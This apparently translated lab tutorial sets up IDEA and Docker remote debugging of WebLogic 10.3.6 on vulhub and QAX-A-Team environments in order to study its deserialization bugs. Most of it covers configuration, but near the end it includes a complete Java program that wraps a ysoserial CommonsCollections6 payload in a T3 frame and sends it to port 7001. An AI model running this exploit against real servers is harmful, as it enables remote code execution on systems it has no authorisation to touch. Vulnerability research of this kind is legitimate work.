IDEA + docker remote debugging of WebLogic

Borrowing an IDEA + docker remote-debugging setup to watch, step by step, how WebLogic gets its brains scrambled.

Environment setup, vulhub version

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2017-10271

First expose the container's port 8453. That is the default DEBUG_PORT in setDomainEnv.sh, the port the JDWP listener will bind once debugging is switched on below.

Edit docker-compose.yml so the debug port is mapped next to 7001:

version: '2'
services:
  weblogic:
    image: vulhub/weblogic
    ports:
      - "7001:7001"
      - "8453:8453"

Then run docker-compose up -d to pull and start the image.

Once the pull has finished, enter the container with docker exec -it weblogic /bin/bash and edit /root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh

Add these two lines near the top of the file. The script tests ${debugFlag} further down and, when it is "true", builds JAVA_DEBUG with -Xrunjdwp:transport=dt_socket,address=${DEBUG_PORT},server=y,suspend=n, so the lines must come before that test; appending them at the end has no effect.

debugFlag="true"
export debugFlag

Then docker restart <container id> so the server comes back up with the JDWP agent.

To step through WebLogic we need its classes (IDEA decompiles the jars; there is no real source), so copy the WebLogic jars and the bundled JDK out of the container:

docker cp weblogic:/root ./weblogic_jars

Then open the /root/Oracle/Middleware/wlserver_10.3/ directory (now under ./weblogic_jars) in IDEA.

As shown in the screenshot.

Then collect every *.jar under the Middleware directory into a single test folder. Create the folder first and quote the pattern, otherwise the shell expands *.jar itself whenever a jar sits in the current directory; note also that jars sharing a basename overwrite each other in the flat folder.

The command:

mkdir -p ./test && find ./ -name '*.jar' -exec cp {} ./test/ \;
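The container-side preparation above, written out as one script. This is an added example, not the original post's code or vulhub's: it checks that the compose file maps the debug port, inserts the debugFlag lines at the right place in a copy of setDomainEnv.sh (and does not duplicate them on a second run), copies the jars out without letting same-named jars clobber each other, and probes the JDWP port. Assumptions of mine: the container is named weblogic, setDomainEnv.sh is at the path used above, WebLogic's default DEBUG_PORT 8453 is in use, and nc is installed; the docker-dependent steps only run when the script is invoked as `sh prep_debug.sh setup`.

```shell
#!/bin/sh
# Added helper, not from the original post: prepares the vulhub WebLogic
# container for JDWP remote debugging and collects its jars for IDEA.
# Assumptions (mine): compose service named "weblogic", setDomainEnv.sh at
# the path below, WebLogic's default DEBUG_PORT 8453, nc available for the
# JDWP probe. Docker-dependent steps run only with: sh prep_debug.sh setup
set -eu

CONTAINER=${CONTAINER:-weblogic}
DEBUG_PORT=8453
DOMAIN_ENV=/root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh

# True if docker-compose.yml has a ports entry mapping $2 to $2,
# i.e. a line such as:   - "8453:8453"
compose_exposes_port() {
    grep -Eq "^[[:space:]]*-[[:space:]]*\"?$2:$2\"?[[:space:]]*$" "$1"
}

# Insert debugFlag="true" / export debugFlag right after the shebang of a
# copy of setDomainEnv.sh. The script tests ${debugFlag} part-way through
# to build -Xrunjdwp:transport=dt_socket,address=${DEBUG_PORT},server=y,
# suspend=n, so the lines must precede that test. Running this twice
# leaves a single pair of lines. The file's mode is preserved.
patch_domain_env() {
    file=$1
    if grep -q '^debugFlag="true"' "$file"; then
        return 0
    fi
    tmp=$(mktemp)
    if [ "$(head -c 2 "$file")" = "#!" ]; then
        { head -n 1 "$file"; printf 'debugFlag="true"\nexport debugFlag\n'; tail -n +2 "$file"; } > "$tmp"
    else
        { printf 'debugFlag="true"\nexport debugFlag\n'; cat "$file"; } > "$tmp"
    fi
    cat "$tmp" > "$file"
    rm -f "$tmp"
}

# Number of debugFlag="true" lines in a file (prints 0 when absent).
count_debug_flag() {
    grep -c '^debugFlag="true"' "$1" || true
}

# Flatten every jar under $1 into $2 for IDEA's library list. The pattern
# is quoted so the shell cannot expand it, and each copy is named after its
# relative path (server/lib/weblogic.jar -> server_lib_weblogic.jar) so two
# jars with the same basename do not overwrite each other.
collect_jars() {
    src=$1
    dst=$2
    mkdir -p "$dst"
    (cd "$src" && find . -type f -name '*.jar') | while read -r jar; do
        rel=$(printf '%s' "${jar#./}" | tr '/' '_')
        cp "$src/$jar" "$dst/$rel"
    done
}

count_jars() {
    find "$1" -type f -name '*.jar' | wc -l | tr -d ' '
}

# Docker-dependent steps, mirroring the manual procedure in the post.
setup_container() {
    compose_exposes_port docker-compose.yml "$DEBUG_PORT" ||
        { echo "docker-compose.yml does not map $DEBUG_PORT:$DEBUG_PORT" >&2; exit 1; }
    docker cp "$CONTAINER:$DOMAIN_ENV" ./setDomainEnv.sh
    patch_domain_env ./setDomainEnv.sh
    docker cp ./setDomainEnv.sh "$CONTAINER:$DOMAIN_ENV"
    docker restart "$CONTAINER"
    docker cp "$CONTAINER:/root" ./weblogic_jars
    collect_jars ./weblogic_jars/Oracle/Middleware ./test
    echo "$(count_jars ./test) jars collected into ./test"
    # A JDWP listener echoes the 14-byte "JDWP-Handshake" and then accepts
    # commands from anyone, with no authentication: keep 8453 bound to
    # localhost or a lab-only network.
    printf 'JDWP-Handshake' | nc -w 2 127.0.0.1 "$DEBUG_PORT" | head -c 14
    echo
}

if [ "${1:-}" = "setup" ]; then
    setup_container
fi
```

The JDWP probe at the end is the check worth keeping: if it prints JDWP-Handshake, the agent is up, and anyone who can reach that port can load and run classes in the WebLogic JVM, so the port mapping is for a throwaway lab host only.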

Then add the test directory under Libraries.

For the JDK, select the JDK 6 that ships with WebLogic 10.3.6 (it was copied out with /root above).

Once both have been added, two entries show up here.

Then add a Remote run configuration pointing at the docker host.

The port is 8453.

Apply it and start it in Debug mode.

When the console shows the line in the picture below (IDEA reports that it is connected to the target VM), the debugger is attached.

Then set a breakpoint on line 129 of /wlserver_10.3/server/lib/weblogic.jar!/weblogic/wsee/jaxws/WLSServletAdapter.class

Send the request to wls-wsat with Burp.

When execution stops as in the picture below, it worked.

Environment setup, QAX-A-Team version

Build WebLogic following the document below and start the docker container:

https://github.com/QAX-A-Team/WeblogicEnvironment

Then add the modules directory from the WebLogic installer jar straight into IDEA's Libraries

and configure remote debugging in the run configuration as before.

I wrote my own sender for a CommonsCollections6 (CC6) chain against WebLogic 10.3.6: the serialized gadget chain is generated with ysoserial ahead of time and saved as cc6.ser, and the code below wraps it in a T3 frame and ships it to port 7001.

package org.exploit.Weblogic;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;

public class WebLogicExploit {

    // Load the serialized CC6 gadget chain, generated beforehand with ysoserial, from disk.
    // A missing file is a hard error: sending an empty payload would fail silently.
    public static byte[] generatePayload() throws IOException {
        String filePath = "cc6.ser";
        return Files.readAllBytes(Paths.get(filePath));
    }

    // Wrap the payload in a T3 frame and send it to the T3 listener
    public static void T3Exploit(String ip, int port, byte[] payload) throws IOException {
        try (Socket socket = new Socket(ip, port)) {
            OutputStream outputStream = socket.getOutputStream();
            InputStream inputStream = socket.getInputStream();

            // T3 handshake; a WebLogic server replies with "HELO:<version>..."
            String handshake = "t3 10.3.6\nAS:255\nHL:19\nMS:10000000\n\n";
            outputStream.write(handshake.getBytes(StandardCharsets.UTF_8));
            outputStream.flush();

            byte[] response = new byte[1024];
            int len = inputStream.read(response);
            if (len <= 0) {
                System.out.println("No T3 response");
                return;
            }
            String responseData = new String(response, 0, len, StandardCharsets.UTF_8);

            // Check that the peer speaks T3 before sending anything else
            if (responseData.contains("HELO")) {
                System.out.println("WebLogic");
            } else {
                System.out.println("Not WebLogic");
                return;
            }

            // Frame layout: 4-byte big-endian total length (patched in below),
            // a captured T3 message header, the 0xfe010000 marker that precedes
            // the serialized object, then the serialized gadget chain itself
            byte[] header = hexStringToByteArray("00000000");
            byte[] t3Header = hexStringToByteArray("016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006");
            byte[] desFlag = hexStringToByteArray("fe010000");

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            byteArrayOutputStream.write(header);
            byteArrayOutputStream.write(t3Header);
            byteArrayOutputStream.write(desFlag);
            byteArrayOutputStream.write(payload);

            byte[] fullPayload = byteArrayOutputStream.toByteArray();

            // Write the total frame length into the first four bytes, big-endian
            byte[] lengthPrefix = new byte[4];
            for (int i = 0; i < 4; i++) {
                lengthPrefix[i] = (byte) ((fullPayload.length >> (8 * (3 - i))) & 0xFF);
            }

            // Send the length prefix followed by the rest of the frame
            outputStream.write(lengthPrefix);
            outputStream.write(fullPayload, 4, fullPayload.length - 4);
            outputStream.flush();
        }
    }

    // Convert a hex string into the bytes it encodes
    private static byte[] hexStringToByteArray(String s) {
        int len = s.length();
        byte[] data = new byte[len / 2];
        for (int i = 0; i < len; i += 2) {
            data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
                    + Character.digit(s.charAt(i + 1), 16));
        }
        return data;
    }

    public static void main(String[] args) {
        String ip = "192.168.152.128";
        int port = 7001;

        try {
            byte[] payload = generatePayload();
            T3Exploit(ip, port, payload);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

The breakpoint is hit, so the server can be debugged while the payload is processed.

Use docker ps to find the id of the running container (docker images lists images, not containers, so it is the wrong command here).

Enter the container: docker exec -it 1985c4752c41 /bin/bash

and check there whether the payload did its job.

Reference: https://www.cnblogs.com/ph4nt0mer/p/11772709.html
